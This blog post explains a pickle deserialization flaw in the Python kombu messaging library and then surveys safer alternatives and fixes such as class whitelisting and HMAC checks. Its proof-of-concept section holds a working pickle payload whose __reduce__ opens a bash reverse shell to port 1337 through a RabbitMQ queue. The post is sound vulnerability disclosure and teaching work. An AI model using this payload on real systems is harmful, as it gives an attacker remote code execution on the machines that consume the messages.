Sour Pickles

Authored by Md Abdullahil Kafi, secure software engineer at OpenRefactory. Edited by Charlie Bedard

Introduction

Pickle vulnerabilities are so widespread that it has become common knowledge in the Python world similar to the buffer overflow vulnerability in the C world.

Recently, our team found a deserialization issue (CWE 502: Deserialization of untrusted data) in kombu, a messaging library for Python. As with all unsafe deserialization vulnerabilities, this bug can also be exploited to gain arbitrary remote code execution (RCE). The maintainers acknowledged the risk, but they were also concerned about backward compatibility.

The kombu messaging library can use rabbitmq, radis and other amqp protocol implementations to transport messages reliably. kombu supports different types of message formats like json, yaml, msgpack and also pickle.

Our recommendation for kombu was to drop support for pickle as they already support other data formats. But the maintainers were not definitive about that. After all, the pickle library is used widely.

In this blog post, I plan to double click on three things.

1. What can happen if a serialization vulnerability is exploited? I will describe a proof-of-concept exploit.
2. How is the pickle library used in the world? I will explore the alternatives.
3. How can the pickle library be used in a safe way? I will also highlight some community efforts.

What Happens When a Serialization Vulnerability is Exploited?

Let us demonstrate a proof of concept that exploits this bug to gain arbitrary remote code execution. For this, we will use a rabbitmq server in a docker container as the message transport.

The goals of the attacker:

- Inject a malicious payload into the message queue.
- Ensure that the victim deserializes the payload, triggering the reverse shell.

To accomplish these goals, the attacker might write a simple Python program to produce the payload and put it in the message queue as follows:

				
					from __future__ import annotations
from kombu import Connection

class BadClass:
	def __reduce__(self):
    	    import os
    	    return (os.system, ("/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1", ))

with Connection('amqp://guest:guest@localhost:5672//') as conn:
	simple_queue = conn.SimpleQueue('simple_queue')
	simple_queue.put(BadClass(), serializer='pickle')
	print("Sent")
	simple_queue.close()

The __reduce__()in method in BadClass defines how the object should be serialized and deserialized. It returns a tuple where the first element is a callable (in this case, os.system), and the second element is its arguments (/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1). When deserialized, it executes /bin/bash to create a reverse shell to the attacker’s machine.

The attacker sends the payload to the message queue and starts a netcat listener on port 1337 with cat -nvlp 1337.

The consumer code below is used to fetch and deserialize the pickle object from the message queue.

				
					from __future__ import annotations
from kombu import Connection

with Connection('amqp://guest:guest@localhost:5672//') as conn:
	simple_queue = conn.SimpleQueue('simple_queue', accept=['pickle'])
	message = simple_queue.get(block=True, timeout=1)
	print("Received")
	message.ack()
	simple_queue.close()

When the victim executes the consumer code, he unknowingly executes the malicious code embedded in the object and establishes the reverse shell for the attacker:

The whole process can be simplified in the following diagram:

The root cause of this vulnerability is that Python lets the __reduce__ function of an object tell the deserializer how to deserialize a pickled object. The attackers can then misuse this function to gain RCE just upon de-serialization of a pickled object. The __reduce__ functionality is at the very core of pickle deserialization. Many complex Python objects may not be correctly deserialized without it.

Alternatives to pickle

There has been previous work done to use pickle safely in the past, e.g., spickle and safepickle. None of them are actively maintained due to lack of community interest. More recent work has been done to make a safer implementation of pickle: larch-pickle. This implementation differs from the other two implementations as it is written from scratch. While spickle and safepickle were making another layer of abstraction on top of Python’s implementation of pickle, larch-pickle was not. So, there is a risk of it not being compatible with all of pickle‘s features.

Larch-pickle introduces a whitelist approach. When the secure=True parameter is used while loading, it checks if the class being loaded is in the whitelist or not. So, if your class is not in the whitelist, you cannot unpickle it. This prevents unintentional classes from being loaded. This reduces the attack surface by a large margin. There is a risk that it might not be maintained properly in the future if there is not enough community support and interest in it like other implementations of pickle. Also it can not completely restrict a threat actor from gaining RCE. It just makes it a little harder. Security, after all, is about raising the bar most of the time.

Ways to fix pickle bugs

What Have Others Done?

While researching this topic, I have made a small list of bugs that have been registered with a CVE related to unsafe deserialization of pickles. You can find the list here.

This is just a small list of all the bugs related to pickle. You can find more here. The list goes on to show that a lot of these bugs are unpatched for months even when it is marked critical. Some of the bugs are being disputed between the maintainers because the bug actually does not affect them as they have already notified the users of the implication of using pickles and it is the responsibility of the users to use pickles carefully. It reminds me how everyone knows memory corruption vulnerabilities happen due to programmers not using pointers carefully and it is not the fault of the language but a feature. And I hate to say it but it is true.

A lot of the bugs have gone through some fixes like dropping support for pickle and using json/yaml/msgpack instead. One of the fixes verifies the pickles being transferred through socket using hmac verification. But one bug fix stands out from the rest. It is CVE-2024-39705. They stopped pickle from de-serializing all classes and methods. They do this by deriving a new unpickler class from the original unpickler class responsible for unpickling pickles by modifying the find_class method. Their implementation restricts all classes and methods from being loaded. It can be modified to allow or disallow certain classes or methods from being unpickled. This way, we can use the pickle from Python’s builtin library and still be able to use pickle safely. This is an example of what could be done in case we really need to use pickle.

What We Recommend

There is no one fix to ‘fix-em-all’ for pickle bugs. Even though all pickle bugs arise due to de-serialization of untrusted data, different situations call for different measures and approaches to fix them. Some common scenarios that often occur and potential fix for them are listed below:

- The pickles are only written to the disk and read from the disk. They are never transferred over the network. Then there is no risk in using pickles however you wish. Because if someone untrusted gets write access to your disk, you should have something more serious to worry about.
- If the pickles are used to store and load configuration or settings, consider using json/yaml/toml. That way, you will be able to also modify the settings outside your application.
- If the pickles contain data such as an ML model weight or a session state that needs to be immutable, consider using pickle and use hmac authentication to verify that the pickle has not been tampered with.
- If the pickles are sent over the network between trusted parties, always verify the pickles using hmacauthentication. You can also consider using encryption if TLS/SSL does not already encrypt your communication.
- If the pickles are sent over the network between untrusted parties, It is recommended to drop support for pickle and use a data-only message format like msgpack. But if you absolutely need pickle, use whitelist/blacklist on the receiver end to limit which classes/methods can be unpickled.

Md. Abdullahil Kafi, security engineer at OpenRefactory, wrote this blog post. You may also be interested to read this other article on the problems with the pickle library.

Sour Pickles

Introduction

What Happens When a Serialization Vulnerability is Exploited?

Alternatives to pickle

Ways to fix pickle bugs

What Have Others Done?

What We Recommend

Recent Posts

Sour Pickles

Securing Software Supply Chains With The Six ‘F’ Strategies

How Good is DeepSeek in Driving An Agentic Architecture? – A Comparative Case Study

One Ring to Rule Them All

The Benefits of Knowing the Future